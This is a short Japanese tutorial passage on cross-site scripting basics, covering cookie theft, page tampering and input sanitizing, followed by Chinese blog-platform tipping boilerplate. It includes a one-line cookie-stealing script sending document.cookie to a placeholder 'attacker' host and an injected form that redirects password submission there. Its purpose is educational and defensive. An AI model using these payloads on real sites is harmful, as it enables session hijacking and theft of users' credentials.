連載二、クロスサイトスクリプティング基本

XSSセキュリティホールによる起こり得る被害

●cookieの盗難

 これがXSSの被害としては一般に広く知られている。「document.location="http://attacker/cookie.cgi?

cookie="+document.cookie;」というスクリプトを実行されると、攻撃者サイトのcookie.cgiにユーザーのcookieを

含んだ形でアクセスすることになる。攻撃者サイトのWebサーバのログにも残るだろうし、cookieデータを受けたCGI

ではどんな処理でもできることになる。

cookieに個人情報やセッションIDのような情報だけを格納している場合は、cookieのセッションIDだけでユーザー認

証を行っている場合は危険である。


●ページの改ざん


<form action="regist.cgi">
<input type="hidden" name="sample" value="○○">
パスワード: <input type="text" name="name" value="password">
<input type="submit">
</form>


<form action="regist.cgi">
<input type="hidden" name="sample" value=""></form><form action="http://attacker/regist.cgi">
パスワード: <input type="text" name="name" value="password">
<input type="submit">
</form>


●HTTPおよびHTML文内の特殊文字の対策

XSS対策の最初の一歩は「入力チェック」
  入力チェックの落とし穴
  すべてのパラメータをチェックをする
  毎回チェックをする

特殊文字のサニタイジング(無害化)
  文字をサニタイジングするには、それぞれ「<」「>」「&」に変換する。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值